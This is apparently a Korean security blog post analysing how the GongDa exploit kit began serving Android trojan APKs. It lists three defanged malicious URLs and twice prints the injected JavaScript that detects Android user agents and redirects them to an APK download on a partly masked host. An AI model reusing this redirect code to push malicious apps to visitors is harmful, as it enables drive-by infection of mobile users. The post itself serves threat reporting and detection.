Malware Exploit Script로 유명한 공다팩(GongDa Exploit Kit, Dadong)에서 Java, SWF, IE 취약점 이외에
안드로이드 어플리케이션인 APK 파일 까지 다운로드를 시도하는 것이 포착되었다
아직까지 PC에서만큼 DBD(Drive-By-Download)가 자동으로 실행되진 않지만, 접속한 사용자의 OS Agent를 확인하여
모바일이면 APK 스크립트가 동작하여 다운로드까지는 가능할 수 있도록 코드가 추가되었다.
현재 확인 된 URL은 총 3개이다.
hxxp://naver.ejeongmin.com/kim/index.html
hxxp://naver.tendersmile.kr/kr/index.html
hxxp://www.toronsil.com/flash/cao/index.html
아래의 그림은 실제 Gongda Exploit Kit 에서 apk 다운로드가 추가 된 소스코드 내용이다.
위 코드에 삽입 된 "안드로이드 추가 다운로드" 코드는 아래와 같다.
function is_pc(){
var os = new Array("Android","iPhone","Windows Phone","iPod","BlackBerry","MeeGo","SymbianOS"); // 페儉잚謹돨盧땡꾸鱗溝固잚謹,菱契警속
var info = navigator.userAgent;
var len = os.length;
for (var i = 0; i < len; i++) {
if (info.indexOf(os[i]) > 0){
if (info.indexOf("Android") > 0){
return false;
}
}
}
return true;
}
if(!is_pc())
{
document.location.href = "http://www.****.or.kr/unsa.apk";
}
function is_pc(){
var os = new Array("Android","iPhone","Windows Phone","iPod","BlackBerry","MeeGo","SymbianOS"); // 페儉잚謹돨盧땡꾸鱗溝固잚謹,菱契警속
var info = navigator.userAgent;
var len = os.length;
for (var i = 0; i < len; i++) {
if (info.indexOf(os[i]) > 0){
if (info.indexOf("Android") > 0){
return false;
}
}
}
return true;
}
if(!is_pc())
{
document.location.href = "http://61.38.***.***:8080/mbn.apk";
}
※ 해당 코드들은 http://www.oschina.net/code/snippet_734122_19107 사이트에서 소개 하듯이 클라이언트가
PC인지 모바일인지 식별하는 코드를 조금 수정한 코드이다.
그리고 악성으로 테스트 하기에는 좀 그래서;;;
해당 코드를 이용하여 테스트랩을 구성하였더니, 모바일 단말기에 다운로드가 되는 것을 확인하였다.
또한 다운로드 된 안드로이드 어플리케이션 파일(APK)은 알약 안드로이드에서도 탐지가 가능하다.
※ 알약 안드로이드 탐지명 : Trojan.Android.SMS.Stech.Gen, Trojan.Android.KRBanker
'IT 보안소식' 카테고리의 다른 글
| CJ대한통운(CJ KoreaExpress), 택배배송정보조회 프로그램을 이용한 개인정보 유출 사건 (2014-03-17) (0) | 2014.03.18 |
|---|---|
| 구글 크롬(Google Chrome), 33.0.1750.154 업데이트!! (6) | 2014.03.15 |
| 구글 크롬(Google Chrome), 33.0.1750.149 업데이트!! (0) | 2014.03.12 |
| 삼성전자서비스(SamsunSvc), 갤럭시노트1, 갤럭시노트2 "이랜텍 배터리 스웰링(부풀음)" 무상 교체 공지 (수정사항 있음) (6) | 2014.03.11 |
| 공다팩(GongDa Exploit Kit), 화면에 표기 되는 "404 Not Found" 메시지!! 고의인가? 우연인가? (2) | 2014.03.11 |
댓글